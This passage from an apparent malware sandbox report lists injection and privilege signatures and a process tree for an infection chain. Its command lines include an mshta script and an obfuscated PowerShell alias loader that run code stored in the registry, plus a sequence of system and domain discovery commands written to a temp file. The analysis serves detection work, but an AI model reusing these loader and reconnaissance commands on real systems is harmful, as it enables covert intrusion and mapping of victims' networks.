Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6bc68a4b-b0ee-4f30- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exepowershell.exeExplorer.EXEpid process 4732 regsvr32.exe 4732 regsvr32.exe 2160 powershell.exe 2160 powershell.exe 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
- PID 1032 Explorer.EXE
-
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
- PID 2160 powershell.exe (1 entry)
- PID 1032 Explorer.EXE (4 entries)
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes (token privileges enabled, in the order recorded):
- PID 2160 powershell.exe: SeDebugPrivilege
- PID 1032 Explorer.EXE: SeShutdownPrivilege, SeCreatePagefilePrivilege
- PID 4148 WMIC.exe (the following sequence is recorded twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- PID 1032 Explorer.EXE: SeShutdownPrivilege, SeCreatePagefilePrivilege
- PID 2860 tasklist.exe: SeDebugPrivilege
- PID 3452 RuntimeBroker.exe: SeShutdownPrivilege
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
- PID 1032 Explorer.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source process wrote to memory of target process; repeat counts as recorded):
- PID 2144 regsvr32.exe -> PID 4732 regsvr32.exe (3 times)
- PID 3944 mshta.exe -> PID 2160 powershell.exe (2 times)
- PID 2160 powershell.exe -> PID 5056 csc.exe (2 times)
- PID 5056 csc.exe -> PID 3696 cvtres.exe (2 times)
- PID 2160 powershell.exe -> PID 3472 csc.exe (2 times)
- PID 3472 csc.exe -> PID 4788 cvtres.exe (2 times)
- PID 2160 powershell.exe -> PID 1032 Explorer.EXE (4 times)
- PID 1032 Explorer.EXE -> PID 3452 RuntimeBroker.exe (4 times)
- PID 1032 Explorer.EXE -> PID 3752 RuntimeBroker.exe (4 times)
- PID 1032 Explorer.EXE -> PID 4544 RuntimeBroker.exe (4 times)
- PID 1032 Explorer.EXE -> PID 4380 cmd.exe (2 times)
- PID 4380 cmd.exe -> PID 4148 WMIC.exe (2 times)
- PID 1032 Explorer.EXE -> PID 4916 cmd.exe (4 times)
- PID 4380 cmd.exe -> PID 4912 more.com (2 times)
- PID 1032 Explorer.EXE -> PID 4916 cmd.exe (2 times)
- PID 1032 Explorer.EXE -> PID 3408 cmd.exe (2 times)
- PID 1032 Explorer.EXE -> PID 4476 cmd.exe (2 times)
- PID 4476 cmd.exe -> PID 1308 systeminfo.exe (2 times)
- PID 1032 Explorer.EXE -> PID 2092 cmd.exe (2 times)
- PID 1032 Explorer.EXE -> PID 2808 cmd.exe (2 times)
- PID 2808 cmd.exe -> PID 5116 net.exe (2 times)
- PID 1032 Explorer.EXE -> PID 2328 cmd.exe (2 times)
- PID 1032 Explorer.EXE -> PID 1224 cmd.exe (2 times)
- PID 1224 cmd.exe -> PID 1160 nslookup.exe (2 times)
- PID 1032 Explorer.EXE -> PID 3956 cmd.exe (2 times)
- PID 1032 Explorer.EXE -> PID 3248 cmd.exe (2 times)
- PID 3248 cmd.exe -> PID 2860 tasklist.exe (1 time)
Processes
- C:\Windows\System32\RuntimeBroker.exe (PID 3452)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  Signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\RuntimeBroker.exe (PID 3752)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\Explorer.EXE (PID 1032)
  Command line: C:\Windows\Explorer.EXE
  Signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\regsvr32.exe (PID 2144)
    Command line: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\regsvr32.exe (PID 4732)
      Command line: /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
      Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\mshta.exe (PID 3944)
    Command line: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Nju8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nju8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"
    Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2160)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vvxjvnatxo -value gp; new-alias -name yfnjcifda -value iex; yfnjcifda ([System.Text.Encoding]::ASCII.GetString((vvxjvnatxo "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))
      Signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 5056)
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 3696)
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9625.tmp" "c:\Users\Admin\AppData\Local\Temp\z3qafhng\CSCB25259DA0BF41C685C145E7B77F9D39.TMP"
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 3472)
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 4788)
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96D1.tmp" "c:\Users\Admin\AppData\Local\Temp\4psv2yna\CSC93A0155896EB444294CFA73FFC9517FC.TMP"
  - C:\Windows\system32\cmd.exe (PID 4380)
    Command line: cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\Wbem\WMIC.exe (PID 4148)
      Command line: wmic computersystem get domain
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\more.com (PID 4912)
      Command line: more
  - C:\Windows\syswow64\cmd.exe (PID 4916)
    Command line: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  - C:\Windows\system32\cmd.exe (PID 3408)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 4476)
    Command line: cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\systeminfo.exe (PID 1308)
      Command line: systeminfo.exe
      Signatures: Gathers system information
  - C:\Windows\system32\cmd.exe (PID 2092)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 2808)
    Command line: cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net.exe (PID 5116)
      Command line: net view
      Signatures: Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID 2328)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 1224)
    Command line: cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\nslookup.exe (PID 1160)
      Command line: nslookup 127.0.0.1
  - C:\Windows\system32\cmd.exe (PID 3956)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 3248)
    Command line: cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\tasklist.exe (PID 2860)
      Command line: tasklist.exe /SVC
      Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 3700)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 3692)
    Command line: cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    - C:\Windows\system32\driverquery.exe (PID 3472)
      Command line: driverquery.exe
  - C:\Windows\system32\cmd.exe (PID 2120)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 2336)
    Command line: cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    - C:\Windows\system32\reg.exe (PID 1556)
      Command line: reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
  - C:\Windows\system32\cmd.exe (PID 1792)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 2140)
    Command line: cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    - C:\Windows\system32\net.exe (PID 796)
      Command line: net config workstation
      - C:\Windows\system32\net1.exe (PID 4252)
        Command line: C:\Windows\system32\net1 config workstation
  - C:\Windows\system32\cmd.exe (PID 4996)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 1088)
    Command line: cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    - C:\Windows\system32\nltest.exe (PID 3592)
      Command line: nltest /domain_trusts
  - C:\Windows\system32\cmd.exe (PID 1124)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 1208)
    Command line: cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    - C:\Windows\system32\nltest.exe (PID 2920)
      Command line: nltest /domain_trusts /all_trusts
  - C:\Windows\system32\cmd.exe (PID 4356)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 4852)
    Command line: cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    - C:\Windows\system32\net.exe (PID 4476)
      Command line: net view /all /domain
      Signatures: Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID 3312)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 1704)
    Command line: cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
    - C:\Windows\system32\net.exe (PID 696)
      Command line: net view /all
      Signatures: Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID 1808)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
  - C:\Windows\system32\cmd.exe (PID 3952)
    Command line: cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\80C6.bin1 > C:\Users\Admin\AppData\Local\Temp\80C6.bin & del C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
- C:\Windows\System32\RuntimeBroker.exe (PID 4544)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  Signatures: Modifies registry class
Network
MITRE ATT&CK Enterprise v6
Downloads